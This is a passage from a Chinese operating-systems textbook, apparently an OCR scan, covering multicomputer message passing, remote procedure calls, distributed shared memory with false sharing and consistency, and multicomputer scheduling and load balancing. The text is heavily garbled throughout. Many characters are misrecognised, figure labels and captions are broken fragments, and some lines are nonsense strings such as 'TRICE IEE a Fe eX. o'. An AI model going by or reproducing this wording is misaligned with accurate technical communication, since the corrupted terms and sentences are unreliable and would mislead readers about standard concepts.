调用 send 时 ， 它 指定 一 个 目标 以 及 用 以 发 送 消 轧 到 该 目标 的 一 个 缓冲 
区 。 妆 消 恩 发 送 时 ， 发 送 进程 被 阻 罕 〈 挂 起 ) 。 在 消息 已 经 完全 发 送出 
去 之 前 ， 不 会 执行 跟随 在 调用 send 后 面 的 指令 ， 如 图 8-19a 所 示 。 类 似 
地 ， 在 消 妃 真正 接收 并 且 放 入 由 参数 指定 的 消息 缓冲 区 之 前 ， 对 receive 
的 调用 也 不 会 把 控制 返回 。 在 receive 中 进程 保持 挂 起 状态 ， 直 到 消息 到 
达 为 止 ， 这 甚至 有 可 能 等 待 奋 干 小 时 。 在 有 些 系统 中 ， 接 收 者 可 以 指定 
希望 从 谁 处 接收 消 轧 ， 在 这 种 情况 下 接收 者 就 保持 阻塞 状态 ， 直 到 来 目 
那个 用 送 者 的 消息 到 达 为 止 。 











发 送 者 运行 — 发 送 者 被 阻塞 一 一 一 | 发 送 者 运行 





| fa | 
发 送 者 被 阻塞 从 内 核 返 回 ， 
a ee 发 送 者 被 释放 

| 一 一 消息 正在 被 发 送 — 

a) 
发 送 者 被 
阻塞 
发 送 者 运行 | | 发 送 者 运行 


|r mi 

pe a IM 
消息 被 复 
制 到 内 核 


缓冲 区 


图 8-19 人 一 个 阻塞 的 send 调 用 ; b) 一 个 非 阻塞 的 send 调 用 


相对 于 阻 竖 调用 的 另 一 种 方式 是 非 阻塞 调用 〈 有 时 称 为 异步 调 
H) 。 如 果 send 是 非 阻 竖 的 ， 在 消息 发 出 之 前 ， 它 立即 将 控制 返回 给 调 
用 者 。 这 种 机 制 的 优点 是 发 送 进程 可 以 继续 运算 ， 与 消息 传送 并 行 ， 而 
不 是 让 CPU 空 内 (假设 没有 其 他 可 运行 的 进程 》。 通 常 是 由 系统 设计 者 
做 出 在 阻 窗 原 语 和 非 阻 紧 原 语 之 间 的 选择 (或 者 使 用 这 种 原 语 或 者 力 一 
MUR) ， 妆 然 也 有 少数 系统 中 两 种 原 语 同时 可 用 ， 而 让 用 户 决 定 其 袁 
好 。 








但 是 ， 非 阻 豆 原 语 所 提供 的 性 能 优点 被 其 严重 的 缺点 押 抵 消 了 : 直 
到 消息 被 送出 发 送 者 才能 修改 消息 绥 冲 区 。 进 程 在 传输 过 程 中 重 写 消息 


的 后 果 是 如 此 可 怕 以 致 不 得 不 惰 重 考虑 。 更 糟 的 是 ， 发 送 进程 不 知道 传 
和 输 何 时 会 结束 ， 所 以 根本 不 知道 什么 时 候 重用 绥 冲 区 是 安全 的 。 不 可 能 
TRICE IEE a Fe eX. o 


有 三 种 可 能 的 解决 方案 。 第 一 种 方案 是 ， 让 内 核 复制 这 个 消息 到 内 
部 的 内 核 缓 冲 区 ， 然 后 让 进程 继续 ， 如 图 8-19b 所 示 。 从 发 送 者 的 观点 
来 看 ， 这 个 机 制 与 阻 豆 调用 相同 : 只 要 进程 获得 控制 ， 就 可 以 随意 重用 
缓冲 区 了 。 当 然 ， 消 恩人 还 没有 发 送出 去 ， 但 是 发 送 者 是 不 会 被 这 种 情况 
所 妨碍 的 。 这 个 方案 的 缺点 是 对 每 个 送出 的 消 已 都 必须 将 其 从 用 户 空间 
复制 进 内 核 空 间 。 面 对 大 量 的 网 络 接 口 ， 消 恩 最 终 要 复制 进 人 硬件 的 传输 
绥 冲 区 中 ， 所 以 第 一 次 的 复制 实质 上 是 浪费 。 额 外 的 复制 会 明显 地 降低 
系统 的 性 能 。 








第 二 种 方案 是 ， 当 消 轧 发 送 之 后 中 断 发 送 者 ， 告 知 缓冲 区 又 可 以 使 
用 了 。 这 里 不 需要 复制 。 从 而 节省 了 时 间 ， 但 是 用 户 级 中 断 使 编写 程序 
变 得 琼 手 ， 并 可 能 会 要 处 理 苋 争 条 件 ， 这 些 都 使 得 该 方案 难以 设计 并 且 
几乎 无 法 调试 。 


第 三 种 方案 是 ， 让 缓冲 区 写 时 复制 (copy on write) ， 也 就 是 说 ， 
在 消 恕 发 送出 去 之 前 将 其 标记 为 只 读 。 在 消息 发 送出 去 之 前 ， 如 果 绥 冲 
区 被 重用 ， 则 进行 复制 。 这 个 方案 的 问题 是 ， 除 非 缓冲 区 被 孤立 在 自己 
的 页 面 上 ， 人 否则 对 临近 变量 的 写 操作 也 会 导致 复制 。 此 外 ， 需 要 有 额外 
的 管理 ， 因 为 这 样 的 太 送 消 恩 行为 隐 含 者 对 页 面 读 / 写 状态 的 影响 。 最 














后 ， 该 页 面 迟 早 会 再 次 被 写 入 ， 它 会 触发 一 次 不 再 必要 的 复制 。 
这 样 ， 在 发 送 端的 选择 是 
DIER (CPUT ERAEN) 。 
2) 带 有 复制 操作 的 非 阻塞 发 送 (CPU 时 间 浪 费 在 额外 的 复制 上 ) 
3) 带 有 中 断 操 作 的 非 阻塞 发 送 〈 造 成 编程 困难 ) 。 


4) 写 时 复制 “最 终 可 能 也 会 需要 额外 的 复制 ) 





在 正常 条 件 下 ， 第 一 种 选择 是 最 好 的 ， 特 别 是 在 有 多 线程 的 情况 
下 ， 此 时 当 一 个 线程 由 于 试图 发 送 被 阻 赛 后 ， 其 他 线程 还 可 以 继续 
作 。 它 也 不 需要 管理 任何 内 核 缓冲 区 。 而 且 ， 正 如 将 图 8-19a 和 图 8-19b 
进行 比较 所 见 到 的 ， 如 果 不 需 要 复制 ， 通 利 消 妃 会 被 更 快 地 发 出 。 





请 注意 ， 有 必要 指出 ， 有 些 作者 使 用 不 同 的 判别 标准 区 分 同步 和 异 
步 原 语 。 另 一 种 观点 认为 ， 只 有 发 送 者 一 直 被 阻塞 到 消息 已 被 接收 并 且 
有 响应 发 送 回 来 时 为 止 ， 才 是 同步 的 (Andrews，1991) 。 但 是 ， 在 实 
时 通信 和 领域 中 ， 同 步 有 着 其 他 的 含义 ， 不 笠 的 是 ， 它 可 能 会 导致 混 消 。 











正如 send 可 以 是 阻塞 的 和 非 阻塞 的 一 样 ，receive 也 同样 可 以 是 阻塞 
的 和 非 阻 塞 的 。 阻 窄 调用 就 是 挂 起 调用 者 直到 消 因 到达 为 止 。 如 果 有 多 
线程 可 用 ， 这 是 一 种 简单 的 方法 。 另 外 ， 非 阻塞 receive 只 是 通知 内 核 组 


冲 区 所 在 的 位 置 ， 并 几乎 立即 返回 控制 。 可 以 使 用 中 断 来 告知 消 妃 已 经 
到 达 。 然 和 而， 中断 方式 编程 困难 ， 并 且 速 度 很 慢 ， 所 以 也 许 对 于 接收 者 
来 说 ， 更 好 的 方法 是 使 用 一 个 过 程 poll 轮 询 进来 的 消息 。 该 过 程 报 告 是 
人 否 有 消息 正在 等 每 。 奉 是 ， 调 用 者 可 调用 get_message， 它 返回 第 一 个 到 
达 的 消息 。 在 有 些 系统 中 ， 编 译 占 可 以 在 代码 中 合适 的 地 方 插 入 poll 调 
用 ， 不 过 ， 要 掌握 以 怎样 的 频 度 使 用 poll 则 是 需要 技巧 的 。 


还 有 为 一 个 选择 ， 其 机 制 是 在 接收 者 进程 的 地 址 空间 中 ， 一 个 消 忆 
的 到 达 目 然 地 引起 一 个 新 线程 的 创建 。 这 样 的 线程 称 为 弹出 式 线程 
(pop-up thread) 。 这 个 线程 运行 一 个 预定 义 的 过 程 ， 其 参数 是 一 个 指 
问 进 来 消 妃 的 指针 。 在 处 理 完 这 个 消息 之 后 ， 该 线程 直接 退出 并 被 目 动 
撤销 。 


8.2.4 远程 过 程 调 用 


尽管 消息 传递 模型 提供 了 一 种 构造 多 计算 机 操作 系统 的 便利 方式 ， 
但 是 它 有 不 可 救 药 的 缺陷 : 构造 所 有 通信 的 范 型 Cparadigm) 都 是 输入 / 
输出 。 过 程 send 和 receive 基 本 上 在 做 WO 工作 ， 而 许多 人 认为 VO 就 是 一 
种 错误 的 编程 模型 。 





这 个 问题 很 早 就 为 人 所 知 ， 但 是 一 直 没 有 什么 进展 ， 直 到 Birrell 和 
Nelson 在 其 论文 《Birrell 和 Nelson，1984) 中 引进 了 一 种 完全 不 同 的 方 
法 来 解决 这 个 问题 。 尽 管 其 思想 是 令 人 吃惊 的 简单 〈 曾 经 有 人 想到 
过 ) ， 但 其 含义 却 相当 精妙 。 在 本 节 中 ， 我 们 将 讨论 其 概念 、 实 现 、 优 
点 以 及 缺点 。 


简 言 之 ，Birrel 和 Nelson 所 建议 的 是 ， 人 允许 程序 调用 位 于 其 他 CPU 
中 的 过 程 。 当 机 器 1 的 进程 调用 机 器 2 的 过 程 时 ， 在 机 器 1 中 的 调用 进程 
被 挂 起， 在 机 器 2 中 被 调用 的 过 程 执行 。 可 以 在 参数 中 传递 从 调用 者 到 
被 调用 者 的 信息 ， 并 且 可 在 过 程 的 处 理 结果 中 返回 信息 。 根 本 不 存在 对 
程序 员 可 见 的 消息 传递 或 WO。 这 种 技术 即 是 所 谓 的 远程 过 程 调用 
(Remote Procedure Call，RPC) ， 并 且 已 经 成 为 大 量 多 计算 机 的 软件 
的 基础 。 习 惯 上 ， 称 发 出 调用 的 过 程 为 客户 机 ， 而 称 被 调用 的 过 程 为 服 
务 器 ， 我 们 在 这 里 也 将 采用 这 些 名 称 。 








RPC 背 后 的 思想 是 尽 可 能 使 远程 过 程 调用 像 本 地 调用 。 在 最 简单 的 
情形 下 ， 要 调用 一 个 远程 过 程 ， 客 户 程序 必须 被 绑 定 在 一 个 称 为 客户 端 
HE Cclient stub) 的 小 型 库 过 程 上 ， 它 在 客户 机 地 址 空间 中 代表 服务 器 过 
程 。 类 似 地 ， 服 务 器 程序 也 绑 定 在 一 个 称 为 服务 嚣 端 桩 (server stub) 
的 过 程 上 。 这 些 过 程 隐 藏 了 这 样 一 个 事实 ， 即 从 客户 机 到 服务 八 的 过 程 
调用 并 不 是 本 地 调用 。 








进行 RPC 的 实际 步骤 如 图 8-20 所 示 。 第 1 步 是 客户 机 调用 客户 端 
桩 。 该 调用 是 一 个 本 地 调用 ， 其 参数 以 通常 方式 压 入 栈 内 。 第 2 步 是 客 
户 端 桩 将 有 关 参 数 打包 成 一 条 消息 ， 并 进行 系统 调用 来 发 出 该 消息 。 这 
个 将 参数 打包 的 过 程 称 为 编排 (marshaling) 。 第 3 步 是 内 核 将 该 消息 从 
客户 机 发 给 服务 器 。 第 4 步 是 内 核 将 接收 进来 的 消息 传送 给 服务 器 端 桩 
(通常 服务 器 端 柱 已 经 提前 调用 了 receive) 。 最 后 ， 第 5 步 是 服务 器 庙 
桩 调用 服务 器 过 程 。 应 答 则 是 在 相反 的 方向 沿 着 同一 步 又 进行 。 
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图 8-20 进行 远程 过 程 调用 的 步骤 。 桩 用 灰色 表示 





需要 说 明 的 关键 是 由 用 户 编写 的 客户 机 过 程 ， 只 进行 对 客户 端 
桩 的 正常 《本 地 ) 调用 ， 而 客户 端 桩 与 服务 器 过 程 同名 。 由 于 客户 机 过 
程 和 客户 端 桩 在 同一 个 地 址 空间 ， 所 以 有 关 参 数 以 正常 方式 传递 。 类 似 
地 ， 服 务 器 过 程 由 其 所 在 的 地 址 空间 中 的 一 个 过 程 用 它 所 期 望 的 参数 进 
行 调用 。 对 服务 器 过 程 而 言 ， 一 切 都 很 正常 。 通 过 这 种 方式 ， 不 采用 带 
有 send 和 receive 的 WO， 通过 伪造 一 个 普通 的 过 程 调用 而 实现 了 远程 通 
信 。 








实现 相关 的 问题 


无 论 RPC 的 概念 是 如 何 优 雅 , 但 是 “在 草 从 中 仍然 有 儿 条 蛇 隐藏 
厦 ”。 一 大 条 就 是 有 头 指针 参数 的 使 有 用。 通常 ， 给 过 程 传递 一 个 指针 有 是 


不 存在 问题 的 。 由 于 两 个 过 程 都 在 同一 个 虚拟 地 址 空间 中 ， 所 以 被 调用 
的 过 程 可 以 使 用 和 调用 者 同样 的 方式 来 运用 指针 。 但 是 ， 由 于 客户 机 和 
服务 器 在 不 同 的 地 址 空间 中 ， 所 以 用 RPC 传 递 指 针 是 不 可 能 的 。 


在 茶 些 情形 下 ， 可 以 使 用 一 些 技巧 使 得 传递 指针 成 为 可 能 。 假 设 第 
一 个 参数 是 一 个 指针 ， 它 指 问 一 个 整数 k。 客 户 端 桩 可 以 编排 k 并 把 它 发 
送 给 服务 器 。 然 后 服务 器 端 桩 创建 一 个 指 疝 k 的 指针 并 把 它 传递 给 服务 
俐 过 程 ， 这 正如 服务 费 所 期 望 的 一 样 。 当 服务 右 过 程 把 控制 返回 给 服务 
虱 并 桩 后 ， 后 者 把 k 送 回 客户 机 ， 这 里 新 的 k 宁 盖 了 原来 旧 的 ， 只 是 因为 
服务 器 修改 了 它 。 实 际 上 ， 通 过 引用 调用 Ccall-by-reference) 的 标准 调 
用 序列 被 复制 -恢复 〈copy-restore) 所 蔡 代 了 。 然 而 不 季 的 是 ， 这 个 技 
巧 并 不 是 总 能 正 第 工作 的 ， 例 如 ， 如 果 要 把 指针 指向 一 幅 图 像 或 其 他 的 
复杂 数据 结构 就 不 行 。 由 于 这 个 原因 ， 对 于 被 远程 调用 的 过 程 而 言 ， 必 
须 对 参数 做 出 东 些 限制 。 











第 二 个 问题 是 ， 对 于 弱 类 型 的 语言 ， 如 C 语 言 ， 编 写 一 个 过 程 用 于 
计算 两 个 矢量 (数组 ) 的 内 积 且 不 规定 其 任何 一 个 矢量 的 大 小 ， 这 是 完 
全 合法 的 。 每 个 矢量 可 以 由 一 个 指定 的 值 所 终止 ， 而 只 有 调用 者 和 被 调 
用 的 过 程 掌握 该 值 。 在 这 样 的 条 件 下 ， 对 于 客户 端 桩 而 言 ， 基 本 上 没有 
可 能 对 这 种 参数 进行 编排 没有 办 法 能 确定 它们 有 多 大 。 








第 三 个 问题 是 ， 参 数 的 类 型 并 不 总 是 能 够 推导 出 的 ， 甚 至 不 论 是 从 
形式 化 规约 还 是 从 代码 上 自身。 这 方面 的 一 个 例子 是 printt， 其 参数 的 数 


量 可 以 是 任意 的 (至 少 一 个 ) ， 而 且 它 们 的 类 型 可 以 是 整形 、 短 整形 、 
长 整形 、 字 符 、 字 符 串 、 各 种 长 度 的 译 点 数 以 及 其 他 类 型 的 任意 混合 。 
试图 把 printf 作 为 远程 过 程 调用 实际 上 是 不 可 能 的 ， 因 为 C 古 如 此 的 宽 
松 。 然 而 ， 如 果 有 一 条 规则 说 假如 你 不 使 用 C 或 者 C++ 来 进行 编程 才能 


使 用 RPC， 那 么 这 条 规则 是 不 会 受 欢 迎 的 。 

第 四 个 问题 与 使 用 全 局 变量 有 关 。 通 常 ， 调 用 者 和 被 调用 过 程 除了 
使 用 参数 之 外 ， 还 可 以 通过 全 局 变量 通信 。 如 果 被 调用 过 程 此 刻 被 移 到 
远程 机 右上 ， 代 码 将 失效 ， 因 为 全 局 变量 不 再 是 共 诗 的 了 。 








这 里 所 叙述 的 问题 并 不 表示 RPC 束 此 无 望 了 。 事 实 上 ，RPC 被 三 泛 
地 使 用 ， 不 过 在 实际 中 为 了 使 RPC 正 常 工作 需要 有 一 些 限制 和 仔细 的 考 
o 











8.2.5 ”分布 式 共享 仓储 器 


虽然 RPC 有 它 的 吸引 力 ， 但 即便 是 在 多 计算 机 里 ， 很 多 程序 员 仍 旧 
偏爱 共享 存储 器 的 模型 并 且 愿 意 使 用 它 。 让 人 相当 吃惊 的 是 ， 采 用 一 种 
称 为 分 布 式 共享 存储 器 (Distributed Shared Memory, DSM) (Li, 
1986; Li 和 Hudak，1989) 的 拉 术 ， 就 有 可 能 很 好 地 保留 共 至 存储 絮 的 
幻觉 ， 尺 管 这 个 共享 存储 器 实际 并 不 存在 。 有 了 DSM， 每 个 页 面 都 位 于 
如 图 8-1 所 示 的 某 一 个 存储 器 中 。 每 台 机 器 有 其 自己 的 虚拟 内 存 和 页 
表 。 当 一 个 CPU 在 一 个 它 并 不 拥有 的 页 面 上 进行 LOAD 和 STORE 时 ， 会 
陷入 到 操作 系统 当中 。 然 后 操作 系统 对 该 页 面 进行 定位 ， 并 请 求 当前 持 
有 该 页 面 的 CPU 解除 对 该 页 面 的 映射 并 通过 互连网 络 发 送 该 页 面 。 在 该 
页 面 到 达 时 ， 页 面 被 映射 进来 ， 于 是 出 错 指令 重新 启动 。 事 实 上 ， 操 作 
系统 只 是 从 远程 RAM 中 而 不 是 从 本 地 磁盘 中 满足 了 这 个 缺 页 异常 。 对 
用 户 而 言 ， 机 器 看 起 来 拥有 共享 存储 器 。 




















实际 的 共享 存储 器 和 DSM 之 间 的 差别 如 图 8-21 所 示 。 在 图 8-21a 
中 ， 是 一 台 配 有 通过 硬件 实现 的 物理 共享 存储 器 的 真正 的 多 处 理 机 。 在 
图 8-21b 中 ， 是 由 操作 系统 实现 的 DSM。 在 图 8-21c 中 ， 我 们 看 到 另 一 种 
形式 的 共享 存储 器 ， 它 通过 更 高 层次 的 软件 实现 。 在 本 章 的 后 面部 分 ， 
我 们 会 讨论 第 三 种 方式 ， 不 过 现在 还 是 专注 于 讨论 DSM。 














便 件 便 件 ie | 人 硬件 人 硬件 人 硬件 














共享 存储 器 共享 存储 器 共享 存储 器 
a) b) c) 
图 821 实现 共享 存储 器 的 不 同 层次 : D, DIR R A, OMPA 
软件 


先 考察 一 些 有 关 DSM 是 如 何 工 作 的 细节 。 在 DSM 系 统 中 ， 地 址 空 
间 被 划分 为 页 面 (page) ， 这 些 页 面 分 布 在 系统 中 的 所 有 节点 上 。 当 一 
个 CPU 引 用 一 个 非 本 地 的 地 址 时 ， 就 产生 一 个 陷阱 ，DSM 软 件 调 取 包含 
该 地 址 的 页 面 并 重新 开始 出 错 指令 。 该 指令 现在 可 以 完整 地 执行 了 。 这 
一 概念 如 图 8-22a 所 示 ， 该 系统 配 有 16 个 页 面 的 地 址 空间 ，4 个 节点 ， 
个 节点 能 持 有 6 个 页 面 。 


在 这 个 例子 中 ， 如 果 CPU 0 引用 的 指令 或 数据 在 页 面 0、2、5 或 9 


中 ， 那 么 引用 在 本 地 完成 。 引 用 其 他 的 页 面 会 导致 陷入 。 例 如 ， 对 页 面 
10 的 引用 会 导致 陷入 到 DSM 软 件 ， 该 软件 把 页 面 10 从 节点 1 移 到 节点 0， 
如 图 8-22b 所 示 。 


1. 复 制 


对 基本 系统 的 一 个 改进 是 复制 那些 只 读 页 面 ， 如 程序 代码 、 只 读 常 
量 或 其 他 只 读数 据 结构 ， 它 可 以 明显 地 提高 性 能 。 举 例 来 说 ， 如 果 在 图 
8-22 中 的 页 面 10 是 一 段 程序 代码 ，CPU 0 对 它 的 使 用 可 以 导致 将 一 个 副 
本 送 往 CPU 0， 从 而 不 用 打扰 CPU 1 的 原 有 存储 器 ， 如 图 8-22c 所 示 。 在 
这 种 方式 中 ，CPU 0 和 CPU 1 两 者 可 以 按 需 要 经 常 同 时 引用 页 面 10， 而 
不 会 产生 由 于 引用 不 存在 的 存储 器 页 面 而 导致 的 陷阱 。 





由 16 个 页 面 组 成 的 全 局 共享 的 虚拟 存储 器 
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网 络 


a) 





A 822 四 分 布 在 四 台 机 器 中 的 地 址 空间 页 面 ; b) 在 CPU 1 引用 页 面 10 
后 的 情形 ; @ 如 果 页 面 10 是 只 读 的 并 且 使 用 了 复制 的 情形 





另 一 种 可 能 是 ， 不 仅 复制 只 读 页 面 ， 而 且 复制 所 有 的 页 面 。 只 要 有 
读 操 作 在 进行 ， 实 际 上 在 只 该 页 面 的 复制 和 可 读 写 页 面 的 复制 之 间 不 存 
在 差别 。 但 是 ， 如 果 一 个 被 复制 的 页 面 突然 被 修改 了 ， 就 必须 采取 必要 
的 措施 来 避免 多 个 不 一 致 的 副本 存在 。 如 何 避 免 不 一 致 性 将 在 下 面 几 贡 
中 进行 讨论 。 








2. 伪 共享 


向 





在 东 些 关键 方式 上 DSM 系 统 与 多 处 理 机 类 似 。 在 这 两 种 系统 中 ， 当 
引用 非 本 地 存储 器 字 时 ， 从 该 字 所 在 的 机 器 上 取 包 含 该 字 的 一 块 内 存 ， 
并 放 到 进行 引用 的 《分 别 是 内 存储 圳 或 高 速 缓存 ) AR La LE. 
要 的 设计 问题 是 应 该 调 取 多 大 一 块 。 在 多 处 理 机 中 ， 其 高 速 缓存 块 的 大 
小 通常 是 32 字 市 或 64 子 节 ， 这 是 为 了 避免 占用 总 线 传输 的 时 间 过 长 。 在 
DSM 系 统 中 ， 块 的 单位 必须 是 页 面 大 小 的 整数 倍 ( 因 为 MMU 以 页 面 方 
式 工作 ) ， 不 过 可 以 是 1 个 、2 个 、4 个 或 更 多 个 页 面 。 事 实 上 ， 这 样 做 
号 模拟 了 一 个 更 大 尺寸 的 页 面 。 














对 于 DSM 而 言 ， 较 大 的 页 面 大 小 有 优点 也 有 缺 挟 。 其 最 大 的 优点 
是 ， 因 为 网 络 传输 的 启动 时 间 是 相当 长 的 ， 所 以 传递 4096 字 市 并 不 比 传 
输 1024 个 字 市 多 花费 多 少时 间 。 在 有 大 量 的 地 址 空间 需要 移动 时 ， 通 过 
采用 大 单位 的 数据 传输 ， 通 币 可 减少 传输 的 次 数 。 这 个 特性 是 非常 重要 
的 ， 因 为 许多 程序 表现 出 引用 上 的 局 部 性 ， 其 含义 是 如 果 一 个 程序 引用 
了 茶 页 中 的 一 个 字 ， 很 可 能 在 不 久 的 将 来 它 还 会 引用 同一 个 页 面 中 其 他 




















另 一 方面 ， 大 页 面 的 传输 造成 网 络 长 期 占用 ， 阻 赛 了 其 他 进程 引起 
的 故障 。 还 有 ， 过 大 的 有 效 页 面 引起 了 男 一 个 问题 ， 称 为 伪 共 至 (false 
sharing) ， 如 图 8-23 所 示 。 图 8-23 中 一 个 页 面 中 含有 两 个 无 关 的 共享 变 
量 A 和 B。 进 程 1 大 量 使 用 A， 进 行 读 写 操作 。 类 似 地 ， 进 程 2 经 常 使 用 
。 在 这 种 情形 下 ， 含 有 这 两 个 变量 的 页 面 将 在 两 台 机 器 中 来 回 地 传 








CPU 1 CPU 2 







人 变量 ， 
们 恰巧 在 同一 个 页 面 上 





使 用 变量 B 
的 代码 


使 用 变量 A 
的 代码 






网 络 
图 8-23 含有 两 个 无 关 变 量 的 页 面 的 伪 共 享 


这 里 的 问题 是 ， 尽 管 这 些 变量 是 无 关 的 ， 但 它们 碰巧 在 同一 个 页 面 
内 ， 所 以 当 某 个 进程 使 用 其 中 一 个 变量 时 ， 它 也 得 到 男 一 个 。 有 效 页 面 
越 大 ， 友 生 伪 共 至 的 可 能 性 也 越 蜗 ， 相 反 ， 有 效 页 面 越 小 ， 友 生 伪 共享 
的 可 能 性 也 越 少 。 在 普通 的 虚拟 内 存 系 统 中 不 存在 类 似 的 现象 。 





理解 这 个 问题 并 把 变量 放 在 相应 的 地 址 空间 中 的 高 明 编译 费 能 够 帮 


助 减少 伪 共 孚 并 改善 性 能 。 但 是 ， 说 起 来 容易 做 起 来 难 。 而 且 ， 如 宁 伪 
共有 至 中 节点 1 使 用 茶 个 数组 中 的 一 个 元 素 ， 而 节点 2 使 用 同一 数组 中 的 为 
一 个 元 系 ， 那 么 即使 再 高 明 的 编译 占 也 没有 办 法 消除 这 个 问题 。 


3. 实 现 顺序 一 致 性 








如 果 不 对 可 写 页 面 进行 复制 ， 那 么 实现 一 致 性 是 没有 问题 的 。 每 个 
可 写 页 面 只 对 应 有 一 个 副本 ， 在 需要 时 动态 地 来 回 移动 。 由 于 并 不 是 
能 提前 了 解 哪些 页 面 是 可 写 的 ， 所 以 在 许多 DSM 系 统 中 ， 当 一 个 进程 试 
图 读 一 个 远程 页 面 时 ， 则 复制 一 个 本 地 副本 ， 在 本 地 和 远程 各 目 对 应 的 
MMU 中 建立 只 读 副 本 。 只 要 所 有 的 引用 都 做 读 操作 ， 那 么 一 切 正 常 。 








但 是 ， 如 果 有 一 个 进程 试图 在 一 个 被 复制 的 页 面 上 写 入 ， 潜 在 的 一 
致 性 问题 就 会 出 现 ， 因 为 只 修改 一 个 副本 却 不 管 其 他 副本 的 做 法 是 不 能 
接受 的 。 这 种 情形 与 在 多 处 理 机 中 一 个 CPU 试图 修改 存在 于 多 个 高 速 组 
存 中 的 一 个 字 的 情况 有 类 似 之 处 。 在 多 处 理 机 中 的 解决 方案 是 ， 要 进行 
写 的 CPU 首先 将 一 个 信号 放 到 总 线 上 ， 通 知 所 有 其 他 的 CPU 丢弃 该 高 速 
绥 存 块 的 副本 。 这 里 的 DSM 系 统 以 同样 的 方式 工作 。 在 对 一 个 共享 页 面 
进行 写 入 之 前 ， 先 向 所 有 持 有 该 页 面 副本 的 CPU 发 出 一 条 消息 ， 通 知 它 
们 解除 映射 并 丢弃 该 页 面 。 在 其 所 有 解除 映射 等 工作 完成 之 后 ， 该 CPU 
便 可 以 进行 写 操作 了 。 




















在 有 详细 约束 的 情况 下 ， 人 允许 可 写 页 面 的 多 个 副本 存在 是 有 可 能 





的 。 一 种 方法 是 允许 一 个 进程 获得 在 部 分 虚拟 地 址 空间 上 的 一 把 锁 ， 然 
后 在 被 锁 住 的 存储 空间 中 进行 多 个 读 写 操作 。 在 该 锁 被 释放 时 ， 产 生 的 
修改 可 以 传播 到 其 他 副本 上 去 。 只 要 在 一 个 给 定 的 时 刻 只 有 一 个 CPU 能 
锁 住 某 个 页 面 ， 这 样 的 机 制 束 能 保持 一 致 性 。 


另 一 种 方法 是 ， 当 一 个 潜在 可 写 的 页 面 被 第 一 次 真正 写 入 时 ， 制 作 
一 个 “干净 ”的 副本 并 保存 在 发 出 写 操作 的 CPU 上 。 人 然后 可 在 该 页 上 加 
锁 ， 更 新 页 面 ， 并 释放 锁 。 稍 后 ， 当 一 个 远程 机 器 上 的 进程 试图 获得 该 
页 面 上 的 锁 时 ， 先 前 进行 写 操作 的 CPU 将 该 页 面 的 当前 状态 与 “干净 ” 副 
本 进行 比较 并 构造 一 个 有 关 所 有 已 修改 的 字 的 列表 ， 该 列表 接着 被 送 往 
获得 锁 的 CPU， 这 样 它 就 可 以 更 新 其 副本 页 面 而 不 用 废弃 它 (Keleher 等 
人 ，1994) 。 








8.2.6 ”多 计算 机 调度 


在 一 台 多 处 理 机 中 ， 所 有 的 进程 都 在 同一 个 存储 器 中 。 当 某 个 CPU 
完成 其 当前 任务 后 ， 它 选择 一 个 进程 并 运行 。 理 论 上 ， 所 有 的 进程 都 是 
潜在 的 候选 者 。 而 在 一 台 多 计算 机 中 ， 和 情形 就 大 不 相同 了 。 每 个 节点 有 
其 自己 的 存储 器 和 进程 集合 。CPU 1 不 能 突然 决定 运行 位 于 节点 4 上 的 一 
个 进程 ， 而 不 事先 花费 相当 大 的 工作 量 去 获得 该 进程 。 这 种 蕾 别 说 明 在 
多 计算 机 上 的 调度 较为 容易 ， 但 是 将 进程 分 配 到 节点 上 的 工作 更 为 重 


要 。 下 面 我 们 将 讨论 这 些 问题 。 














多 计算 机 调度 与 多 处 理 机 的 调度 有 些 类 似 ， 但 是 并 不 是 后 者 的 所 有 
算法 都 能 适用 于 前 者 。 最 简单 的 多 处 理 机 算法 一 一 维护 就 绪 进 程 的 一 个 
中 心 链表 一 一 就 不 能 工作 ， 因 为 每 个 进程 只 能 在 其 当前 所 在 的 CPU 上 运 
行 。 不 过 ， 当 创建 一 个 新 进程 时 ， 存 在 着 一 个 决定 将 其 放 在 哪里 的 选 
择 ， 例 如 ， 从 平衡 负载 的 考虑 出 发 。 











由 于 每 个 节点 拥有 目 己 的 进程 ， 因 此 可 以 应 用 任何 本 地 调度 算法 。 
但 是 ， 仍 有 可 能 采用 多 处 理 机 的 群 调度 ， 因 为 惟一 的 要 求 是 有 一 个 初始 
的 协议 来 决定 哪个 进程 在 哪个 时 间 权 中 运行 ， 以 及 用 于 协调 时 间 权 的 起 
点 的 东 种 方法 。 





8.2.7 ”负载 平衡 


需要 讨论 的 有 关 多 计算 机 调度 的 内 容 相 对 较 少 。 这 是 因为 一 旦 一 个 
进程 被 指定 给 了 一 个 节点 ， 就 可 以 使 用 任何 本 地 调度 算法 ， 除 非 正在 使 
用 群 调度 。 不 过 ， 一 旦 一 个 进程 被 指定 给 了 某 个 节点 ， 就 不 再 有 什么 可 
控制 的 ， 因 此 ， 哪 个 进程 被 指定 给 哪个 节点 的 决策 是 很 重要 的 。 这 同 多 
处 理 机 系统 相反 ， 在 多 处 理 机 系统 中 所 有 的 进程 都 在 同一 个 存储 器 中 ， 
可 以 随意 调度 到 任何 CPU 上 运行 。 因 此 ， 值 得 考察 怎样 以 有 效 的 方式 把 
进程 分 配 到 各 个 节点 上 。 从 事 这 种 分 配 工 作 的 算法 和 启发 则 是 所 谓 的 处 
理 器 分 配 算法 (processor allocation algorithm) 。 











多 年 来 已 出 现 了 大 量 的 处 理 器 (市 点) 分 配 算法 。 它 们 的 差别 是 分 
别 有 各 目的 前 提 和 目标 。 可 知 的 进程 属性 包括 CPU 需求 、 存 储 医 使 用 以 
及 与 每 个 其 他 进程 的 通信 量 等 。 可 能 的 目标 包括 最 小 化 由 于 缺少 本 地 工 
作 而 银 费 的 CPU 周期 ， 最 小 化 总 的 通信 带宽 ， 以 及 确保 用 户 和 进程 公平 
性 等 。 下 面 将 讨论 几 个 算法 ， 以 使 读者 了 解 各 种 可 能 的 情况 。 


1. 图 论 确 定 算 法 


有 一 类 被 广泛 研究 的 算法 用 于 下 面 这 样 一 个 系统 ， 该 系统 包含 已 知 
CPU 和 存储 器 需求 的 进程 ， 以 及 给 出 每 对 进程 之 间 平 均 流 量 的 已 知 矩 
阵 。 如 果 进 程 的 数量 大 于 CPU 的 数量 k， 则 必须 把 奋 干 个 进程 分 配给 每 


个 CPU。 其 想法 是 以 最 小 的 网 络 流量 完成 这 个 分 配 工作 。 








该 系统 可 以 用 一 个 带 权 图 表示 ， 每 个 顶点 是 一 个 进程 ， 而 每 个 弧 代 
表 两 个 进程 之 间 的 消息 流 。 在 数学 上 ， 该 问题 就 简化 为 在 特定 的 限制 条 
